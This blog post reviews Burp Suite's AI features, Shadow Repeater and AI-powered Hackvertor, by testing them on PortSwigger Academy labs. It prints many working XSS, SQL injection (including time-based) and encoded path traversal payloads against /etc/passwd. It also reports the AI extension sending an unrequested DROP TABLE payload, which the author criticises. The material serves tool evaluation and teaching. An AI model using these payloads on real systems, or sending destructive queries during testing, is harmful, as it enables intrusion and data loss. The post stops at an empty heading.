BurpSuite’s New AI Features: Are they as AI-mazing as they sound!?

Whilst it seems like everyone and their pets are currently integrating Artificial Intelligence (AI) into their workflows, the folks over at PortSwigger have been quietly cooking something up. This isn't surprising: the team there is fantastic and tends to only drop big news when there is substance behind it. Last week, I saw James Kettle (@albinowax) on LinkedIn discussing some new features coming to Burp Suite. In fact, PortSwigger ran an internal competition to pitch AI features to add to Burp Suite. That's pretty cool, right? From Gareth Heyes (@garethheyes):

At PortSwigger we had an opportunity to pitch our ideas for an AI feature in a Dragons Den-style competition.

Anyway, it's Monday and I've had some coffee, so I decided to dive head-first into these new features and see whether, as usual, the hype was reserved for the right reasons. This post will walk through several new features, as well as draw your attention to some changes to documentation and best practices when using AI in Burp Suite. This isn't intended to be a comprehensive guide, deep dive, or even research on the new features; just a gentle introduction, some ideas, concepts, and hopefully some useful information.

Note that, at the time of writing, you will need the "Early Adopter" download package from PortSwigger and a Burp Suite Professional subscription. We will go over how to install the "Early Adopter" version in this post and also how to enable the AI features. If you are reading this after BurpAI has reached the production releases, you can ignore that content.

TLDR: Blog Overview

The blog content we will be covering today has been summarized below, without the use of AI:

  • New AI Feature List
  • Changes to Documentation/EULA
  • Early Adopters
  • Shadow Repeater
  • AI Powered Hackvertor
  • Conclusion

New Feature List

The first thing that caught my eye was the Shadow Repeater function. This was written by Gareth Heyes and is designed to enhance the testing of parameters for common web vulnerabilities, such as XSS and path traversal. It does this by automatically (behind the scenes) sending requests that build on the payloads used by the tester. It tries to understand context from changes in the response, and appears to be a great way to ensure you didn't accidentally miss a vulnerability due to a missing quote or the wrong encoding. We will dive into Shadow Repeater later in the blog, including setup, usage, and any observations we had when testing it.

Mr Heyes had also released his AI enhancements for Hackvertor the week before. Hackvertor, for those unaware, is an extension that allows you to dynamically encode, decode, and transform HTTP traffic in Burp Suite. It uses a tag-based system which lets you specify how the content between the tags is interpreted. It's not magic, but it enhances your workflow and generally makes life easier.

For example, in Repeater, you might want to Base64 encode a specific part of your request. Just wrap your <@base64>text in here</@base64> and you'll send dGV4dCBpbiBoZXJl instead. So, what's the AI component? Well, now you can describe the type of tag you want to add, and the AI will create it for you. The example given in the accompanying release video is a tag that reverses text. Then, you'd just stick your text in <@reverse>between these tags</@reverse>… and in your request it would be sent, quite incoherently, as "sgat eseht neewteb"!
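If you want to sanity-check those two transformations outside Burp, the equivalent logic is trivial in plain Java (this is just a verification of the examples above, not Hackvertor's implementation):

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class TagCheck {
    public static void main(String[] args) {
        // Equivalent of wrapping text in <@base64>...</@base64>
        String encoded = Base64.getEncoder()
                .encodeToString("text in here".getBytes(StandardCharsets.UTF_8));
        System.out.println(encoded); // dGV4dCBpbiBoZXJl

        // Equivalent of the AI-generated <@reverse>...</@reverse> tag
        String reversed = new StringBuilder("between these tags").reverse().toString();
        System.out.println(reversed); // sgat eseht neewteb
    }
}
```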

Finally (as of the date of writing), there is also now the ability to use the Montoya API with AI and LLMs to help build and extend extensions with the integrated PortSwigger AI. From reading the documentation, it abstracts away the complexities of sending and receiving AI prompts in code and instead lets you focus on the core idea of your extension. I foresee this increasing the speed at which extensions can be produced, as well as improving the quality and usability of those that are. From a security perspective, it also helps that you no longer have to handle your own GPT/Grok/<insert AI here> keys.
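To make that concrete, a skeleton AI-enabled extension looks something like the sketch below. This is based on my reading of the Montoya AI documentation at the time of writing, so treat the exact class and method names as assumptions to verify rather than gospel:

```java
import burp.api.montoya.BurpExtension;
import burp.api.montoya.EnhancedCapability;
import burp.api.montoya.MontoyaApi;
import burp.api.montoya.ai.chat.Message;
import burp.api.montoya.ai.chat.PromptResponse;

import java.util.Set;

public class MyAiExtension implements BurpExtension {
    @Override
    public Set<EnhancedCapability> enhancedCapabilities() {
        // Explicitly declares AI support, so the per-extension "Use AI" checkbox appears
        return Set.of(EnhancedCapability.AI_FEATURES);
    }

    @Override
    public void initialize(MontoyaApi api) {
        api.extension().setName("AI demo");

        if (api.ai().isEnabled()) {
            // PortSwigger routes this through their AI platform - no personal API keys needed
            PromptResponse response = api.ai().prompt().execute(
                    Message.systemMessage("You are a concise HTTP response analyst."),
                    Message.userMessage("Summarise this response in one sentence: ..."));
            api.logging().logToOutput(response.content());
        }
    }
}
```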

Documentation, Documentation, Documentation

With the introduction of the new AI features, you can peep some new pages in the Burp Suite documentation as well as some changes to the EULA (highlighted on the releases page). I didn't memorize the previous EULA and can't tell you exactly which changes relate to AI, but as with everything, I always advise erring on the side of caution whenever sending data to any AI agent.

The primary additions to the documentation begin here. You can just read these, but I’ve summarized them below. In terms of best practices:

  1. All extensions must explicitly declare AI support, and the user must be running a version of Burp Suite that enables AI support. This ensures a checkbox can be ticked per extension that "allows" AI to be used.
  2. You should minimize the data sent to the LLMs. I don’t think this is a surprise if you’ve ever used GPT with an API key. The more you want to send and receive, the more you spend financially. Restricting what is sent to only what is necessary is a great way to reduce this spend and enhance processing times.
  3. Using effective prompts will ensure higher quality responses. This is a no-brainer and any casual AI user will no doubt have noticed it.
  4. Use lower temperatures for accuracy. You can consider this like "hot and cold" in some ways: a higher number gives the AI permission to be more creative. Thus, consider what you need it for. Do you WANT it to be creative and try to find solutions? Turn it up, and match it to the context of the task.
  5. Error catching and optimization. Basically, AIs and LLMs can fail for a variety of reasons (and statistically are more likely to fail than pre-defined input/output systems), so ensure there's suitable error handling set up to fail gracefully.

For an overview of implementing the best practices and examples in code, check the link below (I've also put a rough sketch of my own after it):

https://portswigger.net/burp/documentation/desktop/extensions/creating/creating-ai-extensions/developing-ai-features
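As a taster, here's a minimal sketch that rolls practices 1, 2, 4, and 5 into a single helper. The signatures are taken from PortSwigger's AI extension docs as I read them, so treat them as approximations and verify against the page above:

```java
import burp.api.montoya.MontoyaApi;
import burp.api.montoya.ai.chat.Message;
import burp.api.montoya.ai.chat.PromptException;
import burp.api.montoya.ai.chat.PromptOptions;

public class BestPracticePrompt {
    // Sends only a minimal snippet (practice 2), uses a tight prompt (practice 3),
    // pins a low temperature for accuracy (practice 4), and fails gracefully (practice 5).
    static String classifyHeader(MontoyaApi api, String headerSnippet) {
        if (!api.ai().isEnabled()) {
            return "AI disabled - skipping"; // respect the user's AI settings (practice 1)
        }
        try {
            return api.ai().prompt().execute(
                    PromptOptions.promptOptions().withTemperature(0.2),
                    Message.systemMessage("Answer with a single word: yes or no."),
                    Message.userMessage("Is this header a session token? " + headerSnippet)
            ).content();
        } catch (PromptException e) { // e.g. out of credits, platform error
            return "AI call failed: " + e.getMessage();
        }
    }
}
```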

Finally, the docs also state that you get some AI credits to use with the new services. From PortSwigger’s documentation page:

All Burp users currently receive 10,000 free AI credits. You can buy extra AI credits from the PortSwigger site.

Hopefully, by the end of this post, I can give you an idea of how many credits went into its creation [spoiler: check the end to see how many I used]. PortSwigger state that 10,000 credits are worth about $5.


Early Adopter

If you are reading this shortly after the AI release, you may be wondering how to get onto the Early Adopter branch. Luckily, you don’t need any special membership, you just need to have the correct version installed.

Head over to the Burp Releases page and ensure you are clicking on the latest “Early Adopter” version.

https://portswigger.net/burp/releases#professional

Downloading Burp Suite Early Adopter

Run the installer. Once done, you can load up Burp Suite and head over to the user settings. Under the "Updates" section, be sure to set the update channel to "Early Adopter".

Setting the updates to use the "Early Adopter" channel

Burp Suite should then reboot into the "Early Adopter" mode. You can confirm this at the top of the window.

The Burp UI Title Pane

Nothing much else needs to be done from there to get the Shadow Repeater and various other “Early Adopter” modules to be available. They should now show up in the BApp store, as seen below.

Shadow Repeater in the BApp store

When you go to your extensions page, be sure to tick the "Use AI" checkbox. I like this sort of "guardrail" and think it will come in handy when an extension has both AI and non-AI functionality, which we'll probably see with the AI-powered Hackvertor later on.

AI guardrails option accessible on the extensions page

Shadow Repeater

Let’s start with Shadow Repeater. The goal of this section is to try to understand the functionality and evaluate its use cases. I’ll be using PortSwigger’s own academy labs for this and testing various components and noting anything that might be useful.

By default, Shadow Repeater is invoked on every fifth Repeater request you make, and it requires a parameter or header to have been changed.

It was important for me to understand what Shadow Repeater is good at, and what it isn’t. It is my hope that the following sections highlight this, and allow you (as a pro web app hacker/bug bounty hunter) to understand its limitations and get the most out of it. More discussion on this in the Ramblings section.

Easiest XSS Challenge, I choose you!

I’ll load up the most basic XSS challenge from PortSwigger:

The description of the first XSS challenge in PortSwigger

After playing with the application for a little while, I can see that using the search box reflects my input in the response without sanitization.

Potential XSS injection in the search field

I sent a few modified requests to the repeater, each with a slight mistake on traditional XSS payloads, such as spelling “script” wrong or forgetting tags:

  • /?search=<s>test</s>
  • /?search=script>alert(1)</script>
  • /?search=<sript>alert(1)</script>
  • /?search=<script>aert(1)</script>
  • /?search=<sriptalert(1)</script>
  • /?search=<script>aert(1)</script>

Sure enough, on the fifth request, I had some action in my “Organizer” tab. I’ve tried to get all the information into the image. As you can see, it has flagged the baseline request/response, as well as a pretty incoherent note:

The Organizer tab in burp after an unusual response is detected

Evidently, it did successfully fix my script tags, but that payload didn't pop an alert for me. Good first effort though? It flagged a response difference that I could then attack manually after realising my spelling mistakes.

You can see output relating to what the tool performed (though, it’s somewhat vague) in the Extension output tab:

The Shadow Repeater output tab

Using Logger++ (which everyone should be using), we can see all the requests that are made by extensions. This is really interesting from the AI perspective, as we can ascertain certain details around its thought process and how it determines what to flag.

Let’s break it down. As you can see, between my repeater requests, there were 6 extra requests sent with the “Tool” being “Extensions”. The first, ID 35, we can assume to be a baseline check. We saw that in the output in the “Organizer” tab. I have highlighted the requests made by the extension in red below. My requests are in green.

The Shadow Repeater requests that were made

I think this is really interesting from a "how does this thing work" perspective. The first baseline request has a response length of 3183. The four subsequent requests (ID 36-39) look like the AI trying to establish a baseline differentiator. It increments from a 4-character input to a 6-character input, then an 8-character input. The response length goes up each time the input grows by 2 characters, which is probably it learning how the response changes with different inputs. I would imagine other fields, such as timing differentiators, are also factored into the analysis.
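You can sketch that inference in a few lines. The toy illustration below uses the 3183 baseline from the screenshot; the probe response lengths are made up purely to show the idea of confirming verbatim reflection:

```java
import java.util.List;

public class LengthCalibration {
    record Probe(int inputLen, int responseLen) {}

    // If every extra input character adds exactly one byte to the response,
    // the parameter is almost certainly reflected verbatim.
    static boolean looksReflected(int baselineLen, List<Probe> probes) {
        return probes.stream()
                .allMatch(p -> p.responseLen() - baselineLen == p.inputLen());
    }

    public static void main(String[] args) {
        int baseline = 3183; // baseline response length from the lab
        List<Probe> probes = List.of(
                new Probe(4, 3187), new Probe(6, 3189), new Probe(8, 3191)); // illustrative values
        System.out.println(looksReflected(baseline, probes)); // true -> input is reflected
    }
}
```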

Finally, it sends the payload below:

  • /?search=<script>alert('test')<\/script>

This is, funnily enough, extremely close to a correct payload. The only issue is the backslash that escapes the forward slash, thus never closing the script tag. It also URL encodes it for us. So what triggered this as a reason to "flag"? The response doesn't actually trigger an alert, but the resulting HTML appears to break the page structure and remove the footer!

The output of the injection attempt

Going back to the “note” in the Organizer tab:

I think this is saying that the initial request contained one script tag, whilst the new request contains two. But that's just an observation; maybe it's something to do with the way the lines break after them? Overall, it did well to flag that there WAS an issue with my payloads (albeit a very simple one).

A Wild “Error-based SQL Injection” Appeared

I'll play about with a slightly harder lab and attack vector to see if we can get any closer to deducing how it works. The next one will be an error-based SQL injection lab. I expect (before playing with it) that this will be easy enough for it to flag.

SQL Injection lab definition from BurpSuite

I'll start by just sending a few requests to Repeater, then changing some header values, but without invoking any errors myself. As per my previous example, my requests are highlighted in green (you can tell, as the "Tool" is "Repeater") and the AI's are highlighted in red.

After 5 requests, the AI started to send requests

I noted a few things from this part of the test. As you can see, the first three requests sent by me (153-154) are variations on the query parameters. Then I switched to playing with cookies, such as adding a new "admin=1" cookie and changing the content of existing cookies. One of these, I knew from the description, would just require a single apostrophe to trigger an SQL error.

My observations are below:

  • Despite the first three requests being for different query parameters, the AI requests purely focused on the FIFTH request and played with the cookie. It did not send derivations of the first 2 requests to different endpoints.
  • The AI again used a baseline request to orientate itself (I sent a request with "TrackingId=123!!" and the first AI request was the same).
  • The AI didn’t start to put any malicious characters in here, and instead, seemed to just mirror my style of [a-zA-Z0-9] input. This is because (as per Gareth Heyes) this works by creating variations of input, rather than trying to understand context.

A list of cookies sent by the AI has been provided below (note only the cookie changed per request):

  • Cookie: TrackingId=123!!; [Baseline]
  • Cookie: TrackingId=kL ;
  • Cookie: TrackingId=RJi8 ;
  • Cookie: TrackingId=GtiFw8;
  • Cookie: TrackingId=KrEwKQgt;
  • Cookie: TrackingId=ghjCC4WwVNh4zSxa;
  • Cookie: TrackingId=gahCC3XwVNh4zSxa;
  • Cookie: TrackingId=gahCC3WwVNh5zSxa;
  • Cookie: TrackingId=gahCC3WwVNh4zSym;
  • Cookie: TrackingId=gahCE4WwVNh4zSxa;
  • Cookie: TrackingId=567;
  • Cookie: TrackingId=456!!;
  • Cookie: TrackingId=123@!;
  • Cookie: TrackingId=321!!;
  • Cookie: TrackingId=143?!;

This is pretty interesting. It looks like it went through a similar "orientation" phase before starting to send what it thought were variations of my input (changing orders, adding a few special characters). It did not manage to work out that I was trying to "exploit" something, though I think a lack of identifiable context in my input was to blame. This is the same as with any AI: the clearer you make your goals, the better the output usually is.

Better black box -> Better magic -> Better output.

So, let's try again, but this time, let's pretend I've accidentally been testing for SQL injection using double quotes (") rather than single quotes ('). I sent the following cookie 5 times:

  • Cookie: TrackingId=123"+or+1=1--+-;

This resulted in the AI making the following requests itself:

  • Cookie: TrackingId=123"+or+1=1--+-;
  • Cookie: TrackingId=e8  ;
  • Cookie: TrackingId=QIfV  ;
  • Cookie: TrackingId=3Bt6QI;
  • Cookie: TrackingId=ldiZ3vzS;
  • Cookie: TrackingId="123;+DROP+TABLE+users;--";
  • Cookie: TrackingId="123;SELECT+*+FROM+users;--";
  • Cookie: TrackingId="123'or'1'='1";
  • Cookie: TrackingId="123' UNION SELECT null, version()--";

We can see the orientation requests (4 chars, 6 chars twice, 8 chars). Then some legitimate SQL attempts.

Finally, on the last request, it triggered a notification in my Organizer. The second-to-last request was actually perfectly formed SQL, as it closed out each of its single quotes ('), so it didn't register as an injection. But for the last attempt, it knew, as there was a drastic change in the output fields.

My Organizer tab

Again, the "notes" are not overly clear, though they're a little clearer than in the previous output. Evidently, it uses characteristics of previous responses (number of divs, new lines, errors, spaces, warnings) to evaluate a difference in the current responses and flag them. This is just what you'd do with your Intruder output when fuzzing, except it makes the requests for you.
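We can approximate that logic ourselves. The sketch below is my guess at the shape of the heuristic, based purely on those notes; the extension's real logic lives in its source (linked at the end of this post):

```java
import java.util.Map;

public class ResponseDiffer {
    // Crude fingerprint built from characteristics the notes mention:
    // div count, new lines, "error" and "warning" occurrences
    static Map<String, Long> fingerprint(String body) {
        String lower = body.toLowerCase();
        return Map.of(
                "divs", count(lower, "<div"),
                "newlines", count(lower, "\n"),
                "errors", count(lower, "error"),
                "warnings", count(lower, "warning"));
    }

    static long count(String haystack, String needle) {
        long n = 0;
        for (int i = haystack.indexOf(needle); i >= 0; i = haystack.indexOf(needle, i + 1)) n++;
        return n;
    }

    // A payload is "interesting" when its fingerprint diverges from the baseline's
    static boolean interesting(String baselineBody, String candidateBody) {
        return !fingerprint(baselineBody).equals(fingerprint(candidateBody));
    }
}
```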

However, let's talk about the elephant in the room. After reviewing these requests, you can imagine my reaction to one of those inputs:

  • Cookie: TrackingId="123;+DROP+TABLE+users;--";

A meme with Dwayne "The Rock" Johnson

So whilst it correctly started to identify that I was looking for SQL injection issues in the cookie… it also sent something I'd never consider sending on an engagement: a DROP TABLE command!

Now, before I get clobbered for being unrealistic, I know that the chance of this actually working (and dropping tables) is ridiculously low… but it's higher than if I had just been testing manually. And we are in the business of reducing risk 😊 To be successful, it would need to:

  • Be a perfectly formatted SQL injection payload
  • Hit a database containing a table called "users"
  • Be running with permissions to delete said table

But still, I was hoping for some sort of guardrails baked into the prompt it sends. Or maybe there are, and the AI just went rogue 😉 I think this just goes to show that we MUST tread carefully with these new technologies: whilst it would have caught a critical finding I'd missed because I'd fat-fingered the wrong symbol (" -> '), it could also have found me something much worse (the wrath of my client).

My takeaways from this section:

  • The context in which you are sending the fifth request is what matters to Shadow Repeater. If you sent four targeting a query parameter and the fifth to a cookie, it would send its attempts to the cookie.
  • It bases attempts on your type of attack, so it works best when you’re explicitly testing for something that requires variations on payloads. An immediate example that springs to mind is Path Traversal.
  • This AI has no fear! Just kidding, it has no concept of fear, but the point stands: it won't hesitate to send potentially state-changing commands.

Go get ’em Burp AI: Double-Encoded Path Traversal

Ok, so we've started with some arbitrary examples where the solution was pretty simple, and we just didn't quite have the right format in our request. Both times, Shadow Repeater just about managed to work it out for us. Let's go for something more realistic that may be akin to actual testing. For this lab, we have a path traversal that requires double URL encoding and blocks path traversal characters. My prediction (pre-testing) is that it will be very good at this.
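Before diving in, it's worth being precise about what double URL encoding means here. A quick illustration in plain Java (the helper is mine, purely for demonstration):

```java
import java.nio.charset.StandardCharsets;

public class DoubleEncode {
    // Percent-encode every byte of the input (URLEncoder won't encode '.' for us)
    static String pctEncodeAll(String s) {
        StringBuilder out = new StringBuilder();
        for (byte b : s.getBytes(StandardCharsets.UTF_8)) {
            out.append(String.format("%%%02x", b));
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String once = pctEncodeAll("../");        // %2e%2e%2f - survives a naive "../" filter
        String twice = once.replace("%", "%25");  // %252e%252e%252f - survives a decode-then-filter too
        // One decode strips the outer layer; a second decode finally yields "../"
        System.out.println(twice.repeat(5) + "etc/passwd");
    }
}
```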

The Lab Description page

I'll actually just try to perform this myself like I would in an assessment (though in reality I'd probably be sticking stuff through Intruder):

  • /image?filename=64.jpg
  • /image?filename=/etc/passwd
  • /image?filename=../../../../../etc/passwd
  • /image?filename=/var/www/images/../../../../../etc/passwd
  • /image?filename=/var/www/images/....//....//....//....//....//etc/passwd

As always, here is the Logger++ output showing the result of the AI powered repeater after I send my initial 5 requests:

Logger++ output

As you can see… that got it nearly immediately. Pretty impressive actually. I can foresee this being especially useful for parser differentiation style attacks. For those interested, here were the requests that it made:

  • /image?filename=hR++
  • /image?filename=Yj3c++
  • /image?filename=QtezKK
  • /image?filename=jn6GBRVm
  • /image?filename=..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
  • /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

And here are the notes from the Organizer tab:

Burp Organizer view

Path Traversal vs BurpAI – Round 2

Since it did so well there, let’s pit it against another Path Traversal lab, only this time, one that requires a null byte bypass.

I first considered whether it would automatically be able to deduce whether a null byte could help perform a path traversal. So, I started by giving it very little data to work with, but a general idea of my attack path:

  • /image?filename=6.jpg
  • /image?filename=../../../../../etc/passwd
  • /image?filename=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
  • /image?filename=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
  • /image?filename=%252f%252e%252e%252f%252e%252e%252f%252e%252e/etc/passwd
  • /image?filename=/etc/passwd

This resulted in a fairly large number of requests being sent by the AI (compared to what I'd previously observed):

  • /image?filename=/etc/passwd
  • /image?filename=gw++
  • /image?filename=YOit++
  • /image?filename=VxfEyl
  • /image?filename=x2LIDxsU
  • /image?filename=..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
  • /image?filename=..%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%2Fetc%25252fpasswd
  • /image?filename=..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%2Fetc%2Fpasswd
  • /image?filename=..%252E%252E%252F..%252E%252E%252F..%252E%252E%252F..%252E%252E%252Fetc%2F%252Fpasswd
  • /image?filename=%2F..%25c0%25ae%25c0%25ae%2F..%25c0%25ae%25c0%25ae%2F..%25c0%25ae%25c0%25ae%2F..%25c0%25ae%25c0%25ae%2Fetc%2Fpasswd
  • /image?filename=..%25ef%25bc%258e%25ef%25bc%258e%252f..%25ef%25bc%258e%25ef%25bc%258e%252f..%25ef%25bc%258e%25ef%25bc%258e%252fetc%252fpasswd
  • /image?filename=..%25c0%25ae..%25c0%25ae%252f..%25c0%25ae..%25c0%25ae%252f..%25c0%25ae%252e%252e%252fetc%252fpasswd
  • /image?filename=..%2525%2532%2565..%2525%2532%2565..%2525%2532%2565%2Fetc%252fpasswd
  • /image?filename=..%25ff%252e%25ff%252e%252f..%25ff%252e%25ff%252e%252f..%25ff%25E2%2580%25A2%25ff%25E2%2580%25A2%2Fetc%252Fpasswd

Whilst it didn’t get it with the above requests, it did send some pretty interesting encodings that I definitely would not have sent manually. I cobbled them together below:

So I thought I’d give it a little hint and send requests with the “.png” extension (remember, the solution is “../../../../../etc/passwd%00.png”). As always, you can tell my requests from the green border and the AI from the red border. After orientating itself, it again looked to focus on encoding rather than trying to manipulate the filename:

There was no dice on that input. I thought I'd give it a bit more of a chance; it was sunny and I was feeling generous! So I started sticking in hints about null bytes and changes to the path itself:

Sadly, it still didn't quite get there, and even started trying pretty arbitrary files at this point. Finally, I sent five requests, one of which was actually valid. It still failed to identify it during the AI-powered requests.

Undeterred, I continued with my exploration of another lab experiment!

Don’t Slow Down, You’re Almost There!

Finally, I wanted to see if it detected time-based issues. The easiest way to do this was to load up a time-based SQL injection challenge and chuck payloads for everything but the correct Database Management System (DBMS) at it and see if Shadow Repeater tried any others for me. Here is the challenge (and solution):

The five requests that I sent were a mix of MSSQL and MySQL time-based payloads:

  • Cookie: TrackingId=123'%2bWAITFOR DELAY '0:0:10'--+-;
  • Cookie: TrackingId=123'%20%2b%20WAITFOR DELAY '0:0:10'--+-;
  • Cookie: TrackingId=123'%20%2b%20sleep(10)--+-;
  • Cookie: TrackingId=123'%3bSELECT+sleep(10)--+-;
  • Cookie: TrackingId=123'%3bWAITFOR DELAY+'0:0:10'--+-;

The subsequent requests sent by the Burp AI Shadow Repeater:

  • Cookie: TrackingId=123'%3bSELECT+sleep(10)--+-;
  • Cookie: TrackingId=Tn ;
  • Cookie: TrackingId=8i17 ;
  • Cookie: TrackingId=p0wvmr;
  • Cookie: TrackingId=r76SbS3v;
  • Cookie: TrackingId=ZdWD2gWB3a1fB3lC;
  • Cookie: TrackingId=123'%2bWAITFOR DELAY '0:0:5'--+-;
  • Cookie: TrackingId=123'%20%2b%20WAITFOR DELAY '0:0:5'--+-;
  • Cookie: TrackingId=123'%20%2b%20sleep(5)--+-;
  • Cookie: TrackingId=123'%3bSELECT+sleep(5)--+-;
  • Cookie: TrackingId=123'%2bWAITFOR DELAY '0:0:15'--+-;
  • Cookie: TrackingId=123'%20%2b%20WAITFOR DELAY '0:0:15'--+-;
  • Cookie: TrackingId=123'%20%2b%20sleep(15)--+-;
  • Cookie: TrackingId=123'%3bSELECT+sleep(15)--+-;
  • Cookie: TrackingId=123'%2b'%2b'A';

There is nothing too interesting there. As you can see, it stuck to what it knew we were looking for (MSSQL and MySQL) and most importantly didn’t try to drop anything (woo). I started to warm it up a little by switching to some PostgreSQL payloads to see if it had any more luck.

  • Cookie: TrackingId=123'+and+pg_sleep(10)--;
  • Cookie: TrackingId=123'+||sleep(10)--;
  • Cookie: TrackingId=123'||sleep(10)--;
  • Cookie: TrackingId=123'|pg_sleep(10)--;
  • Cookie: TrackingId=123||pg_sleep(10);

This resulted in the following AI requests. I have highlighted the winner winner, chicken dinner request that we were looking for!

  • Cookie: TrackingId=123'|pg_sleep(10)--;
  • Cookie: TrackingId=70 ;
  • Cookie: TrackingId=bb1W ;
  • Cookie: TrackingId=bo7CJv;
  • Cookie: TrackingId=pJX6beh2;
  • Cookie: TrackingId=123'%3bWAITFOR DELAY+'0:0:05'--+-;
  • Cookie: TrackingId=123'+and+pg_sleep(5)--;
  • Cookie: TrackingId=123'+||sleep(5)--;
  • Cookie: TrackingId=123'||pg_sleep(5)--;
  • Cookie: TrackingId=123'%26%26pg_sleep(10)--;
  • Cookie: TrackingId=123'%3Bpg_sleep(15)--;
  • Cookie: TrackingId=123'%2BOR+pg_sleep(7)--;
  • Cookie: TrackingId=123'+WAITFOR DELAY+'0:0:10'--+-;
  • Cookie: TrackingId=123'%3bpg_sleep(20)--;
  • Cookie: TrackingId=123'+and+sleep(7)--;

Wow, thanks, Shadow Repeater… or so I thought.

Looking back at my Logger++ and Organizer tab (where any findings are sent for review), it looks as though despite having the correct payload, it didn’t identify anything unusual about the response:

Though in my Logger++ output, it definitely did manage to exploit it:

So, from this, we can also conclude that it may not be great (if capable at all) at identifying payloads that cause time-based differences in the response. That's something to bear in mind when you're putting blind SQLi payloads into Repeater and assuming a successful sleep would be reported. As always, the takeaway here is that these tools are for enhancing our workflow, but we should always be double-checking outputs in Logger++ to spot any issues that neither an extension nor Burp Suite itself flagged.
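If you need to confirm a time-based payload yourself, the oracle is elapsed time rather than response content. A rough manual check along these lines would have caught what Shadow Repeater missed (the target URL is a placeholder and the 8-second threshold is arbitrary):

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.time.Duration;

public class TimingCheck {
    static long elapsedMillis(HttpClient client, String trackingId) throws Exception {
        HttpRequest req = HttpRequest.newBuilder(
                        URI.create("https://TARGET.web-security-academy.net/"))
                .header("Cookie", "TrackingId=" + trackingId)
                .timeout(Duration.ofSeconds(30))
                .build();
        long start = System.nanoTime();
        client.send(req, HttpResponse.BodyHandlers.discarding());
        return (System.nanoTime() - start) / 1_000_000;
    }

    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();
        long baseline = elapsedMillis(client, "123");
        long injected = elapsedMillis(client, "123'||pg_sleep(10)--");
        // A ~10 second delta on the injected request is the signal that never reached the Organizer
        System.out.println(injected - baseline > 8_000
                ? "Time-based SQLi likely" : "No delay observed");
    }
}
```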

Ramblings

For me, these initial tests painted a pretty clear picture of the nature of this extension. I think it will be EXTREMELY helpful for very niche issues, such as finding a specific encoding that hasn't been considered or that is parsed differently between a frontend and backend proxy. There is such potential in the way it creates so many similar payloads and automatically tries to derive differences in responses.

On the flip side, it's probably going to miss a LOT too, just by its nature. If it's only sending 10 extension requests (configurable, but you'd want to limit it reasonably well as it costs credits) and some of these are using unprintable characters, then it's obviously missing some of the basic requests too. Here we looked at it through the lens of "can you spot the issue?" rather than "can you complement my testing?", and the latter is the better way to view this companion extension. This is echoed by Gareth Heyes in the following statement on the release page, which caught my eye:

My second breakthrough was instead of telling the AI to understand what is being tested, I simply told it to find variations of it. This meant giving the AI general instructions to find variations but not going to detail about what it’s actually testing. This works surprisingly well: it’s aware of the context thanks to the Request Differ and knows the data you’re testing. It generated variations for Path Traversal, XSS, and other types of vulnerabilities.

I think that removing the concept of “understanding” what is being tested removes a fair bit of the context that AI systems NEED to proficiently and accurately do their job. However, by just asking for variations of specific insertion points, we’re also more likely to find things we’d have missed before. It became clear whilst using Shadow Repeater that it was not about sporadically finding vulnerabilities (we have Active Scan for that), but it was about enhancing payload generation and potentially identifying previously unknown ways of attacking things.

AI-Powered Hackvertor

I'm going to cover this, though not in as much detail as the previous section, as I don't think it's quite as complex a beast. I introduced Hackvertor earlier, and I actively encourage any aspiring web application tester to use it: it improves your workflow, helps you identify vulnerabilities based on different encodings, and is generally less work than trying to remember all the hotkeys and shortcuts that Burp Suite already has. Furthermore, you get access to a larger array of encoding/parsing/encryption methods, which may come in handy when you least expect it!

I would recommend you watch this video if you want an overview of the sorts of things that were advertised when the AI-powered Hackvertor was released (it's great!):

https://www.youtube.com/watch?v=Flg0wOmgbDo

Configuring Hackvertor with AI

As before, you need to ensure you enable the “Use AI” field on the extensions page. You’ll also need to go to the “Hackvertor” tab at the top, then “Settings”, and enable all the AI features. You should end up with a window that somewhat resembles this:

Creating Your First AI Tag

Right, let's create our first AI-powered, magical tag. Head to the "Hackvertor" tab and then click "Create Custom Tag". If you have the AI settings configured correctly (as previously discussed), you can select "AI" as the language. In Gareth's introductory video, he created a tag to crack MD5 hashes. Pretty neat! But we're going to try something a little different; otherwise, why are you here? You may as well just watch his video! I had some ideas whilst first reading about these new features, so here are the results and their efficacy.

Shorter XSS Payloads

The first thing I considered was ways to shorten XSS payloads for report proof-of-concepts. Sometimes, you are injecting into a field with limited characters, and every character counts. It would be cool to be able to stick my payload in a tag and see if it gets shortened enough to fit when it gets sent to the server. Here are the options I fed the AI:

Note that I altered the temperature default to 1.25, which should add a little more fruitiness to the results. Going to the "Custom" tags section in Hackvertor, I can see whether this works…

OK, nice, it successfully found a smaller payload. Success! Next, I considered adding a parameter to it, so that we can give the payload shortener further context. Let's say I want to do the same again but know "script" tags are blocked by a WAF. I'll add a context parameter through which we can feed new information into the tag and make it more detailed. I'll also adjust the initial code so that it is an XSS assistant rather than just a shortener. I personally think the more niche a task you can give it, the better, but we'll see how this goes. The image below shows the prompt now:

The photo below shows the result (first time):

The following table shows how adjusting the temperature affected the output. The context given to the AI was "I need to shorten this payload and avoid the use of script tags".

Temperature | Input                     | Output
1.0         | <script>alert(1)</script> | <svg/onload=alert(1)>
0.2         | <script>alert(1)</script> | <svg onload=alert(1)>
2.0         | <script>alert(1)</script> | ")};alert&lpar;1&rpar;//

The last of those is pretty much invalid. Funnily enough, it only seemed to give me that payload at the maximum temperature; even at 1.95, it produced a valid payload.

I tried to get it to do some WAF bypass stuff and it didn’t fare too well on the higher temperature. Adding an explicit note in the prompt to ONLY return the XSS payload would maybe have solved this, but I can’t explain what happened below:

My Own Content Converter

